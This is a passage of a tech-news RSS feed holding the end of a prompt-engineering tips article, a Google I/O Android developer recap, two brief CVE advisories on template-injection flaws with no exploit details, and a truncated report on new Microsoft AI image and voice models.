<h3 class="wp-block-heading">4. Meta-prompting and self-reflection: Letting the model improve itself</h3>



<p class="wp-block-paragraph">Use the model to refine its own prompt. This is a huge time-saver.</p>



<pre class="wp-block-code"><code>You are an expert prompt engineer. Improve the following prompt for clarity, structure and effectiveness with [target model]. Make it more precise while preserving intent.

Original prompt: [paste]

Provide the improved version and explain your changes.</code></pre>



<p class="wp-block-paragraph">Self-reflection loops (asking the model to critique its own output and revise) are a game-changer for content generation and code-review tasks.</p>



<h3 class="wp-block-heading">5. Multimodal and structured output techniques</h3>



<p class="wp-block-paragraph">With vision-enabled models, I started combining text with images (e.g., uploading architecture diagrams or dashboards).</p>



<p class="wp-block-paragraph"><strong>Tip from experience:</strong> Be extremely specific in describing what the models should focus on.</p>



<h4 class="wp-block-heading">Best practices I learned the hard way</h4>



<ul class="wp-block-list">
<li><strong>Start simple, then layer complexity</strong>: Over-engineered prompts from Day One usually backfire.</li>



<li><strong>Model specific tuning:</strong> Some models respond better to XML delimiters; others to explicit reasoning.</li>



<li><strong>Evaluation and versioning:</strong> Treat prompts like code if you track versions and run automated evals.</li>



<li><strong>Security guardrails:</strong> Always include instructions against prompt injections and respect data boundaries.</li>



<li><strong>When to stop prompting</strong>: For repetitive, high-stakes workflows, move to full agents or an orchestration framework.</li>
</ul>



<h2 class="wp-block-heading">Final takeaways for technical leaders</h2>



<p class="wp-block-paragraph">Advanced prompt engineering has now become a core competency for anyone responsible for enterprise AI outcomes. Start by picking one technique and apply it rigorously to a real business problem. Document before/ after and you will notice why it’s worth mastering.</p>



<p class="wp-block-paragraph">The field continues evolving towards more automated and agentic systems, but the ability to precisely direct AI reasoning remains foundational.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[17 Things to know for Android developers at Google I/O]]></title>
<description><![CDATA[Posted by Matthew McCullough, VP, Product Management, Android DeveloperToday at Google I/O, we announced the many ways we’re powering agentic workflows to increase your productivity and ensure your apps shine across the expanding Android ecosystem. Here’s a recap of 17 of our favorite announcemen...]]></description>
<link>https://tsecurity.de/de/3693511/android-tipps/17-things-to-know-for-android-developers-at-google-io/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693511/android-tipps/17-things-to-know-for-android-developers-at-google-io/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:45 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP7OJeCTRC-RN9j39-rULmU26qB-lZoyIZjjDrq07Z7b5GsfHz3q18ftSgcWReGBgIBkp03B6BVghzWllOC38o4jckzzq-e4a8R23ISeegev98zubhGXbIzhTZaqbCTaPLJC2zkxKYvvNspcM4yXkk94f6PEQHpdyMvlpwogicTWQRn3GEksJHOTQDIG4/s2048/GoogleForDevelopers-AndroidText-StrapiMetacard-2048x1323.png">


<div><div class="separator"><div class="separator"><div class="separator"><i>Posted by Matthew McCullough, VP, Product Management, Android Developer</i></div></div></div></div><div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVq21_VInGStxa8CNxcwiU_tpvlkPXci8aDeSb8qUqBe4teuWUN_vIqBf_W64xjTQMBYFyJkdXB-nshsp9DXXEwzUV8-Zn9feQTbuyLk8l98kAlFQqz3_LZrYaEvCukqXCZuY95tmNzrLFqXSviaTTSxflyAkpXJb88cB7mZ7g0x6fdnKzXqY8i1jmhqM/s4209/GoogleForDevelopers-AndroidText-Blogger-4209x1253.png"><img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVq21_VInGStxa8CNxcwiU_tpvlkPXci8aDeSb8qUqBe4teuWUN_vIqBf_W64xjTQMBYFyJkdXB-nshsp9DXXEwzUV8-Zn9feQTbuyLk8l98kAlFQqz3_LZrYaEvCukqXCZuY95tmNzrLFqXSviaTTSxflyAkpXJb88cB7mZ7g0x6fdnKzXqY8i1jmhqM/s16000/GoogleForDevelopers-AndroidText-Blogger-4209x1253.png"></a></div><div><br></div>Today at <a href="https://io.google/2026/">Google I/O,</a> we announced the many ways we’re powering agentic workflows to increase your productivity and ensure your apps shine across the expanding Android ecosystem. Here’s a recap of 17 of our favorite announcements for Android developers; you can also <a href="https://www.youtube.com/live/KvTRMSa1w4E?si=QBAxNvihPwJCJUuS">see what was announced last week</a> in <a href="https://developer.android.com/events/show">The Android Show: I/O Edition</a>. Stay tuned over the next two days as we dive into all of the topics in more detail!<h2><strong><span>Build High Quality Android Apps Using Agents</span></strong></h2>

  <h3><strong><span>1: Android CLI: helping you build with any agent, LLM, and tool</span></strong></h3>
  <a href="https://goo.gle/CLI_IO26">Android CLI is now stable</a>. It offers programmatic tools that allow any AI agent, including Claude Code, Codex, or Antigravity, to perform core Android tasks much more easily and efficiently. With today’s release, it also provides a bridge to tap directly into the "heavy-lifting" power of Android Studio to give you the production-ready polish needed for professional Android development. By leveraging the new android studio commands, developers can now grant their preferred agents the ability to perform semantic symbol resolution, analyze files for warnings, and even render Jetpack Compose previews. This release also enables official support for "Journeys" through new <a href="https://developer.android.com/tools/agents/android-skills">Android skills</a>, which enables agents to execute end-to-end UI tests under your direction. Watch the <a href="https://www.youtube.com/watch?v=aqmpZocmR8o&amp;list=PLOU2XLYxmsIKL_eEgkKJWDRhYUEvS9eYz&amp;index=23">developer keynote</a>, and tune into the <a href="https://io.google/2026/explore/pa-keynote-7">What’s New in Android tools talk</a> for more information.    <p><span></span></p><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXrW3yDK9uH_I8MDyVxgYbPAXfrNTJvlMkXhaZFrM1X9ob0LvQbGe_ZC6anUeO_VNd181iptI_MIuEEpX-9GZdf6ZTJCN-WHpPzDCLOeSblo8vrjliSZ0rRrHwIsERWBjbbosP-M_WvA2pva9mF5FWVygAwQbdiW3SLZgJj9TpRIruG4H-ILsvSq_b4dc/w640-h442/agy-android-cli%20(2).png"></div><div class="separator"><span><i>You can now easily install Android CLI for use with Google Antigravity 2.0.</i></span></div><p></p>

  <h3><strong><span>2: Build production-ready apps with ease in Google AI Studio</span></strong></h3>
  Developers and creators can now <a href="http://android-developers.googleblog.com/2026/05/build-android-apps-google-ai-studio.html">build native Android apps, simply with a prompt in Google AI Studio</a>. The apps are built with development best practices like Jetpack Compose, Kotlin, and APIs that leverage our recommended developer patterns. Google AI Studio enables developers to prototype, iterate via an embedded emulator, and deploy to physical devices without heavy local installations. Developers are then able to take those apps and share them to Android devices, as well as share them with others for testing through Google Play Console’s internal testing track. If a developer wants to prepare their app for a wider release, they’re able to take it to Android Studio for advanced debugging, testing, and UI polish. Watch the <a href="https://www.youtube.com/watch?v=aqmpZocmR8o&amp;list=PLOU2XLYxmsIKL_eEgkKJWDRhYUEvS9eYz&amp;index=23">developer keynote</a>, and tune into the <a href="https://io.google/2026/explore/pa-keynote-7">What’s New in Android tools talk</a> for more information.<br><br><div><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdRaw1v6rolr4alo0C6AWKdFchsMEQgtOGfmk2Ramb0IoOB7smDcVU3yC7YJMkvVQuCPJ9vQW53tQjaV-5wcgOGzMtFDmb_Jbv40an1kvQdqYburXnsONvLqckKL2MWuShi3XmQEstW761oOLjujOk3FMsh3FyAiy5-Pe7xdTwFdfkWOmEnHhQfUJhtCo/w640-h544/image1.gif"></div><i><div class="separator"><i>Use the embedded Android Emulator to create Android apps in Google AI Studio</i></div></i></div><h2><strong><span>3: Accelerating AI coding assistance with Android Bench</span></strong></h2>
  <a href="http://d.android.com/bench">Android Bench</a> is our LLM leaderboard for Android development challenges. The goal is to accelerate model improvements, so you have more useful options for AI assistance. Many of you have been using open-weight models for AI assistance, so we’re now adding commonly used ones, such as Gemma 4, to the leaderboard, so you can see how LLMs that offer offline access and additional flexibility for power-users measure up. We're continuously working on increasing the difficulty of challenges we’re giving LLMs, to continue encouraging more useful improvements. <h3><strong><span>4: Convert iOS apps to Android with the Migration Assistant in Android Studio</span></strong></h3>
  The Migration Assistant in Android Studio is designed to port apps from platforms like iOS, React Native, or web frameworks to native Android. By simply selecting an existing project, developers can have the agent intelligently map features, convert assets like storyboards and SVGs, and implement Android best practices using Jetpack Compose and our recommended Jetpack libraries. This effectively transforms what used to be weeks of manual porting into a streamlined agentic workflow that only takes hours. We shared a preview of the incoming feature in the <a href="https://www.youtube.com/watch?v=aqmpZocmR8o&amp;list=PLOU2XLYxmsIKL_eEgkKJWDRhYUEvS9eYz&amp;index=23">developer keynote</a>. </div><div><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK7UKI_nzS7gOkDXYONAjCNbQ4eSqlgT8qqMT5D4qf0OjQUNtxj4Urpq-eTROMEDgrqLKGlwMm_lHA7ayG_BC1DkitQI1ZKsF5gYr-mPIxFUsz_8JPcVHFAtnHZoO2CrVjMEvJrqvBz8_WU1I0T1P2diDprR2B47PcA21oS3RLtbgrhmrpiWV-MAw9ks4/w640-h360/image9%20(1).gif"></div><div class="separator"><i>A sneak peek of the Migration Assistant converting an iOS app into a native Android app</i></div>

  <h2><strong><span>Building AI Into Your Apps</span></strong></h2>

  <h3><strong><span>5: Building Intelligent Apps with generative AI</span></strong></h3>
  Generative AI enables you to create apps that are more intelligent, personalized, and agentic than ever before. This year, we introduced the latest advancements in on-device intelligence with a preview of Gemini Nano 4 for tasks like data extraction and summarization. We also expanded cloud capabilities via Firebase AI Logic, allowing developers to leverage Gemini models with robust grounding (including URL, Maps, and web search) to build smarter, more capable assistants. Furthermore, we unveiled our hybrid inference approach and the new <a href="https://goo.gle/ADK_IO26">Agent Development Kit (ADK) for Android</a>, alongside communication protocols like AG-UI and A2UI that simplify the creation of autonomous, agentic experiences. To start integrating these powerful features, explore the <a href="https://developer.android.com/ai">developer documentation</a>, and watch the technical deep dive session where we showcase all these technologies.

  <h3><strong><span>6: Experiment with AppFunctions today</span></strong></h3>
  AppFunctions is an <a href="https://developer.android.com/reference/android/app/appfunctions/package-summary">Android platform API</a> with an accompanying <a href="https://developer.android.com/jetpack/androidx/releases/appfunctions">Jetpack library</a> to simplify building Android MCP integrations. It empowers your apps to behave like on device MCP servers, contributing functions that act as tools for use by agents and assistants. AppFunctions integration with Gemini is currently in a private preview with trusted testers, and you can begin preparing your apps already. You can sign up for the <a href="http://goo.gle/eap-af">Early Access Program</a> and start experimenting using the <a href="http://d.android.com/ai/appfunctions">API guidance</a>, <a href="https://github.com/android/appfunctions">sample</a>, and <a href="https://github.com/android/skills/blob/main/device-ai/appfunctions/SKILL.md">skill</a> today.

  <h2><strong><span>The Future is Adaptive</span></strong></h2>

  <h3><strong><span>7: Android is now Compose First; Views are now in maintenance mode.</span></strong></h3>
  Compose is our standard for UI development, and we are moving to a Compose-first approach for all future guidance and libraries. Building on five years of evolution, the latest releases deliver a more mature toolkit, from the highly customizable Styles API to refined shared element transitions and enhanced input support. These updates allow you to build beautiful, adaptive apps with less code and better performance. Learn more about what Compose-first means for Android Development in <a href="http://android-developers.googleblog.com/2026/05/android-ui-development-is-compose-first.html">our blog post</a>. <br><br></div><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq9kh5gxOfSdY2w9ZeKdWropXpqP7rj4KtodIZA5B_j7ujQu-blrsQKKC0lI4VEsEycpLEwsZeJhHaNOY1Xe9DrIHDwVszYfQN0GQlwxz8xoVfg1oiIr9zNlUyqqdCl2M7pyHoHgVvC7omKRthmXNaO3GE5Q15XeZ1ALiugszd8qHxpWuHo2Eh79zYW4M/w640-h416/image5.png"></div><div><div><i>Build Android UI with Compose</i></div><h3><strong><span>8: Building seamless Android experiences across devices with Jetpack Compose</span></strong></h3><div>The Android ecosystem is now <a href="https://goo.gle/AdaptiveApps_IO26">Adaptive by Default</a>, moving fluidly across phones, foldables, tablets, cars, XR, and expanding usages with <a href="https://developer.android.com/googlebook">Googlebook</a> and connected displays. With over 580 million large-screen devices, and users on multiple devices spending up to 14x more on apps, the investment in adaptive design presents a massive opportunity. <a href="https://developer.android.com/compose">Jetpack Compose</a> is the definitive engine for this transition, offering core tools like our latest <a href="http://goo.gle/nav3">Jetpack Navigation 3</a> release, new experimental <a href="https://developer.android.com/develop/ui/compose/layouts/adaptive/grid">Grid</a> and <a href="https://developer.android.com/develop/ui/compose/layouts/adaptive/flexbox">FlexBox</a> layouts, enhanced non-touch input support, and <a href="https://developer.android.com/media/camera/camerax">CameraX</a> for correct camera previews across any window size. Furthermore, new <a href="https://developer.android.com/tools/agents/android-skills">skills</a> in Android Studio make updating your existing app to adopt these adaptive patterns easier than ever.

  <img src="https://blogger.googleusercontent.com/img/a/AVvXsEi3DD3G6IUrmOwYh7bMq0uieBvGL8li2W48YnUfQfa3ZXy2kD7QvPorNfAyCSmFlBs4q0csXDqmZjhyGf8UHFE2pUNjvqxLaaJhmm6QpSBumq2YkMHI1jyiTNfh5WQhEEY9hP6vWhcbbwflygdTwYzoIdnuIqoht0S6iGKk4pVCnxL2wVXYBMBlcdeneD8"><i>Notability’s Android debut sets a new standard for premium productivity apps. Built with Jetpack Compose, Navigation 3, and Kotlin Multiplatform, it delivers an intuitive, adaptive experience across devices.</i></div><h3><strong><span>9: Create seamless experiences for Googlebook</span></strong></h3>
  Last week we announced <a href="https://developer.android.com/googlebook">Googlebook</a>, a high-performance laptop that provides a large-screen canvas for your existing apps. Building with adaptive principles today helps ensure your app will work on Googlebook. Get started by reviewing relevant <a href="https://developer.android.com/design/ui/desktop">design guidance</a> and <a href="https://developer.android.com/docs/quality-guidelines/adaptive-app-quality/experiences/desktop">developer guidelines</a> for desktop experiences. Try out the new Desktop Emulator available in the Android Studio Canary to to test your apps for this form factor today.</div><div><br></div><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtH3cjiXICi8dNCtQTDV9PTyjt4wPQBl1xA9XGKGU6FmqLRuBm9YyH7HNQsydD6H6F2GIPw2TdUsFyeu2xMFUO2Jk36k5QXjuWNdm_VE8AQftq2w2m0RPFyYfyZjTppSOjzuOEpJMzF08t9V0YZr-xI7mu31uvcRItugwvVxPUBouSmOXt1MsqbB1WPC0/w640-h360/image3.png"></div><div><div><i>New Desktop Android Emulator</i></div><h3><strong><span>10: Unified widget development experience with Jetpack Glance</span></strong></h3>
  Android 17 marks a shift toward a single, Compose-based development model for all widgets. By unifying the experience across mobile, Wear OS, and cars through Jetpack Glance, you can soon scale UI components across the ecosystem with a familiar workflow. <br><br>The breakthrough this year is the integration of RemoteCompose. On mobile and cars, it powers high-fidelity animations, while on Wear OS, it allows Wear Widgets (formerly Tiles) to render complex UI logic natively on remote surfaces. This ensures peak performance on low-power hardware while allowing a cohesive user journey—like checking a flight status on your car dashboard and seeing gate change updates on your wrist.</div><div><br></div><div><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA5s4g4hCW89qdeC2oqrTtxh6q7t9q3-wkOSt3tfVzCT3vhLUd1GMYJrhCjK04O2jyxBGl0R2pclnRq3Kb0f0Td-hV9aukKvZQTfGpGJS6GLK0MqUkpVW_0qiNC1eMGe6NPPhlCHrnQWFYhmbdSzpDnUHh5tjvpmUzZOvY2w_dX1LBnpNctSRmeahXUl4/w640-h320/blog_widgets.gif"></div><div><i>Four widgets are shown cycling through in the Android Auto interface. A clock, a contact card, Google Home favorites and a photo.</i></div><div><i><br></i></div><div><strong><span>11: Expand your reach on the road with Android for Cars</span></strong><br>To help you expand your reach when you build in-car experiences, we're making it easier to build once and deliver your apps to Android Auto and Android Automotive OS. With the latest releases of the Car App Library, you can build customized, distraction-optimized <a href="https://developer.android.com/training/cars/apps/media">templated media apps</a> for both platforms. We're introducing new <a href="https://developer.android.com/design/ui/cars/guides/components/overview">components</a> and template capabilities to give you increased flexibility and more options for laying out content. Parked experiences are expanding too, with immersive video playback coming to Android Auto for phones running Android 17. You can easily adapt your video apps for these parked experiences; <a href="https://docs.google.com/forms/d/e/1FAIpQLSf0z4Nfw8wrloVhlgHDpLgdkg4WXsFj9ni5c1pw0qTvJ3Q4fQ/viewform">apply now to the early access program</a> to publish in these beta categories and learn more about the latest updates in our <a href="http://android-developers.googleblog.com/2026/05/android-for-cars-unifying-platforms-premium-experiences.html">blog</a>.<h3><strong><span>12: Accelerate your development with Android XR Developer Preview 4</span></strong></h3>Inspired by the innovative experiences you’ve built for the platform, we’re continuing to mature our tools with <a href="https://goo.gle/XRSDK_IO26">Developer Preview 4 of the Android XR SDK</a>. A key milestone in this journey is the transition of our core libraries, XR Runtime, Jetpack SceneCore, and ARCore for Jetpack XR, moving to Beta soon to provide a more stable and performant foundation. We are also accelerating hardware access through the <a href="https://goo.gle/Catalyst_IO26">Android XR Developer Catalyst Program</a>, where you can apply for XREAL’s Project Aura, audio glasses, or display glasses developer kits. Watch The latest in Android XR session or <a href="https://goo.gle/XRSDK_IO26">read our blog</a> to see how these updates help you build experiences across the ecosystem.</div><div><br><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyjbgGH7RwGkOkQLoXeLd88Vo7cXRjHLBSRokBWkzvYQUrqqbfrTXukM1u_SuGq0-AoXRPoGABpCOF-HMad4-aoNvXjTVyNXgGpbffTlSQMbTaXJva1c2GiUBx1fhC4fCCd0XO9XFzKNzs6edNqo0RAx-p2ZNXy0l-StJh7AxhyphenhyphenrXi-lqe-jXL0n8oprs/w640-h360/Aura%20Geospatial%20Tour%20Demo%20-%20Draft%2001%20(1).gif"></div><i><div><i>Early preview of the Geospatial API  in ARCore for Jetpack XR, enabling high-precision anchoring of digital content to real-world locations.</i></div></i><h3><strong><span>13: Android is your new home for professional-grade media experiences</span></strong></h3>
  Android 17 streamlines the entire media lifecycle with a production-ready toolkit. High-fidelity capture is now simplified with the CameraXViewfinder Composable, which handles complex scaling and responsiveness on foldables and tablets. For post-production, the new Media3 AI Effects library provides a single interface for premium features like Magic Eraser and Studio Sound, automatically optimizing for the device's hardware. <br><br>The pipeline is completed by CodecDB, offering chipset-specific encoding recommendations to eliminate export noise, and a new Scrubbing Mode in ExoPlayer for ultra-smooth seeking. Whether you’re compositing multi-asset edits with Media3 Transformer or using the streamlined CastPlayer API, these updates ensure a professional-grade experience with significantly less development overhead.</div><div><br><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXXvjrWhhRUXdYJyhuu-Vnf0UP2jKcYhAvUggZJi10kndrixZdx4cD8HEhrWVmavlxAUT5N025Fx1kgOLJP5w83LDUSR3E9YzfIJUuZ3WBedFSBtI_oLgIcxSOYg-s53obwX_8HtYqfxSaz95LVzSiMAdrrwgL4T6TVETwtxxkZV2mSkkAfvYA681zNlc/w640-h542/supercharge%20(1).gif"></div><div class="separator"><i>Low Light Boost and Magic Eraser in action</i></div><h3><strong><span>14: Increase app discovery and engagement on Google TV</span></strong></h3>
  Pointer remotes, which enable motion-controlled input, will be a future way for users to interact with Google TV as it unlocks faster user navigation. App developers can start <a href="https://developer.android.com/training/tv/get-started/hardware#no-touchscreen">declaring support for pointing input</a> to ensure their apps are discoverable on future TVs with pointer remotes. Additionally, the Engage SDK, formerly known as the Video Discovery API, optimizes Resumption, Entitlements, and Recommendations across all Google TV form factors to boost app discovery and engagement. It’s a great time to start onboarding the Engage SDK now, since the legacy Watch Next API, which has been powering your continue watching 1.0 experience, will lose support in the 2nd half of 2027. Get all the details in our <a href="http://android-developers.googleblog.com/2026/05/increase-google-tv-app-discovery.html">blog</a>.</div><div><h3><strong><span>15: Performance: the foundation of a great app experience</span></strong></h3>To help developers navigate memory limits in Android 17, we've launched a suite of optimization tools. The <a href="https://developer.android.com/r8-analyzer">R8 Configuration Analyzer</a> identifies keep rules that are bloating your binary, while <a href="https://developer.android.com/topic/performance/tracing/profiling-manager/how-to-capture">ProfilingManager</a> and the integrated LeakCanary in Android Studio streamline memory leak detection. Furthermore, the new <a href="https://developer.android.com/android-performance-analyzer">Android Performance Analyzer</a> offers advanced AI integration for complex trace analysis and automated SQL query generation to pinpoint performance bottlenecks.     <h2><strong><span>And The Latest on Driving Business Growth </span></strong></h2>

  <h3><strong><span>16: What’s new in Google Play</span></strong></h3>Today's <a href="https://goo.gle/play-io26">updates from Google Play</a> help expand your reach and scale your business with less complexity. We’re redefining Play Store discovery with an immersive, short-form video format called Play Shorts, while expanding your audience beyond the store with app discovery in the Gemini app on Android and web. Plus, we’re introducing powerful new capabilities like agentic catalog management for seamless bulk price and SKU updates, and using Gemini models to enable Play Console  to pre-populate store listings from imported documents—making global localization effortless. </div><div><br><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOB1wGZNYGPgY0ED70X7Dtl2KiFk8kRH4fv3HrXXTWX0-xKkN4Em0mi8QAB0g2w_-4SNcTR4fJazpiQ7XI6-XKeyQniFhULKWNmV8YvyWMuQ9tosvT5ixZ0FOye27DI90R5Tra1eWX3FCX7OrWkgzhvhCD6vtfD8_6-FMfMWDvXoVv3zSTauZwraDGsM4/w640-h360/IO26_BlogInLine_App-discovery-in-Gemini_1920x1080_1605.gif"></div><div><i>Gemini will provide users with app suggestions during a search</i></div>

  <h3><strong><span>17: And of course, Android 17</span></strong></h3>
  Android 17 includes new performance &amp; system architecture improvements (in addition to app memory limits) like a lock-free MessageQueue and a GC with more frequent, less intensive young-generation collections to ensure system-wide stability and smoother UIs. The new <a href="https://developer.android.com/about/versions/17/features/contact-picker">contact picker</a> and <a href="https://developer.android.com/reference/android/content/Intent#ACTION_OPEN_EYE_DROPPER">eyedropper API</a> help minimize the use of sensitive permissions and unnecessary access to user data. <br><br>Review <a href="https://developer.android.com/about/versions/17/behavior-changes-all">the behavior changes</a> to make sure your app is ready for Android 17, including <a href="https://developer.android.com/about/versions/17/behavior-changes-all#bg-audio">background audio hardening</a> and <a href="https://developer.android.com/about/versions/17/behavior-changes-all#sms-otp-all-apps">SMS OTP protection</a>. Get ready to <a href="https://developer.android.com/about/versions/17/behavior-changes-17">target Android 17</a> (API 37) with changes such as mandatory large-screen resizability, certificate transparency by default, and restricted local network access. You can start testing today by enrolling your device <a href="https://android-developers.googleblog.com/2026/04/the-fourth-beta-of-android-17.html">in the Beta</a> or using the latest 17.0 emulator images. <br><br>One more thing. the third beta of our Android 17 quarterly platform release (QPR1) just came out, and it contains a minor SDK release to support a few features that just couldn't wait for QPR2.

  <h2><strong><span>Check out all of the Android &amp; Play Content at Google I/O </span></strong></h2>
  <p><span face="sans-serif">This was just a preview of some of the updates for Android developers at Google I/O. Tune into <a href="https://io.google/2026/explore/pa-keynote-5">What’s New in Android</a> for the latest news and announcements and <a href="https://io.google/2026/">follow Google I/O</a> for much more over the following week!</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-34172 | Giskard-AI giskard-oss up to 0.3.3/1.0.2 Name Message ChatWorkflow.chat special elements used in a template engine]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Giskard-AI giskard-oss up to 0.3.3/1.0.2. This vulnerability affects the function ChatWorkflow.chat of the component Name Message Handler. The manipulation results in improper neutralization of special elements used in a template engi...]]></description>
<link>https://tsecurity.de/de/3692793/sicherheitsluecken/cve-2026-34172-giskard-ai-giskard-oss-up-to-033102-name-message-chatworkflowchat-special-elements-used-in-a-template-engine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692793/sicherheitsluecken/cve-2026-34172-giskard-ai-giskard-oss-up-to-033102-name-message-chatworkflowchat-special-elements-used-in-a-template-engine/</guid>
<pubDate>Sat, 25 Jul 2026 02:23:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/giskard-ai:giskard-oss">Giskard-AI giskard-oss up to 0.3.3/1.0.2</a>. This vulnerability affects the function <code>ChatWorkflow.chat</code> of the component <em>Name Message Handler</em>. The manipulation results in improper neutralization of special elements used in a template engine.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-34172">CVE-2026-34172</a>. It is possible to launch the attack remotely. No exploit is available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-34202 | ZcashFoundation zebra/zebra-chain prior 4.3.0 Transaction ID special elements used in a template engine]]></title>
<description><![CDATA[A vulnerability was found in ZcashFoundation zebra and zebra-chain. It has been classified as problematic. This vulnerability affects unknown code of the component Transaction ID Handler. The manipulation leads to improper neutralization of special elements used in a template engine.

This vulner...]]></description>
<link>https://tsecurity.de/de/3692791/sicherheitsluecken/cve-2026-34202-zcashfoundation-zebrazebra-chain-prior-430-transaction-id-special-elements-used-in-a-template-engine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692791/sicherheitsluecken/cve-2026-34202-zcashfoundation-zebrazebra-chain-prior-430-transaction-id-special-elements-used-in-a-template-engine/</guid>
<pubDate>Sat, 25 Jul 2026 02:23:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/zcashfoundation:zebra">ZcashFoundation zebra and zebra-chain</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This vulnerability affects unknown code of the component <em>Transaction ID Handler</em>. The manipulation leads to improper neutralization of special elements used in a template engine.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-34202">CVE-2026-34202</a>. The attack can be initiated remotely. There is not any exploit available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft launches new in-house AI models it says cut costs up to 89% versus OpenAI]]></title>
<description><![CDATA[Microsoft AI released two new in-house models into public preview on Wednesday — MAI-Image-2.5-Pro, its highest-fidelity image generator to date, and MAI-Voice-2-Flash, a speech model built for high-volume enterprise workloads — while publishing production data that amounts to the company's most ...]]></description>
<link>https://tsecurity.de/de/3690504/it-nachrichten/microsoft-launches-new-in-house-ai-models-it-says-cut-costs-up-to-89-versus-openai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690504/it-nachrichten/microsoft-launches-new-in-house-ai-models-it-says-cut-costs-up-to-89-versus-openai/</guid>
<pubDate>Fri, 24 Jul 2026 02:50:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://microsoft.ai/">Microsoft AI</a> released two new in-house models into public preview on Wednesday — <a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Image-2.5-Pro</a>, its highest-fidelity image generator to date, and <a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Voice-2-Flash</a>, a speech model built for high-volume enterprise workloads — while publishing production data that amounts to the company's most aggressive argument yet that it can power its own products without leaning on OpenAI's frontier models.</p><p>The announcement, made by <a href="https://microsoft.ai/">Microsoft AI's Superintelligence team</a>, lands roughly a year after the company committed to building purpose-built models internally, and it arrives with an unusual level of specificity about where those models now run: <a href="https://www.bing.com/">Bing</a>, <a href="https://www.microsoft.com/en-us/microsoft-365/powerpoint">PowerPoint</a>, <a href="https://www.microsoft.com/en-us/microsoft-365/onedrive/online-cloud-storage">OneDrive</a>, <a href="https://www.microsoft.com/en-us/dynamics-365">Dynamics 365</a>, <a href="https://excel.cloud.microsoft/en-us/">Excel</a>, <a href="https://github.com/features/copilot">GitHub Copilot</a>, and <a href="https://azure.microsoft.com/en-us">Azure</a>. The message to enterprise buyers — and, implicitly, to OpenAI — is that Microsoft's homegrown models are no longer research projects. They are production infrastructure serving millions of users.</p><p>"Each of these enhancements is a step toward the same goal: Microsoft products, powered by Microsoft models," the company wrote in its announcement blog.</p><h2><b>How MAI-Image-2.5-Pro and MAI-Voice-2-Flash stake out opposite ends of the AI cost curve</b></h2><p>The two new releases occupy opposite ends of what Microsoft calls the quality-speed-cost curve, and the positioning is deliberate. <a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Image-2.5-Pro</a> targets the premium tier: hero imagery, detailed editing, and precise in-image text rendering — the last of which has long been a notorious weak spot for image generation models. Microsoft priced the model at $5 per million text input tokens, $8 per million image input tokens, and $106 per million image output tokens. The base <a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Image-2.5</a> model recently launched at <a href="https://microsoft.ai/news/introducing-mai-image-2-5/">No. 2 for image editing on Arena</a>, the community leaderboard that has become a de facto scoreboard for generative media.</p><p>The creative industry appears to be taking notice. Rob Reilly, global chief creative officer at advertising giant WPP, called the Pro model "a strong leap forward for GenMedia tools" in a statement included in Microsoft's announcement, adding that "Microsoft has firmly established itself among the leaders in generative AI."</p><p><a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Voice-2-Flash</a> goes the other direction. First previewed at Microsoft's <a href="https://news.microsoft.com/build-2026/">Build conference</a>, Flash runs twice as fast as MAI-Voice-2 and costs 32% less, priced at $15 per million characters. It is designed for the unglamorous but enormous market of high-volume voice — call centers, voice agents, and real-time speech applications where latency and cost-per-call matter more than marginal gains in expressiveness. Together, the two models reflect a strategy of building families of models rather than a single flagship, because, as the company put it, a 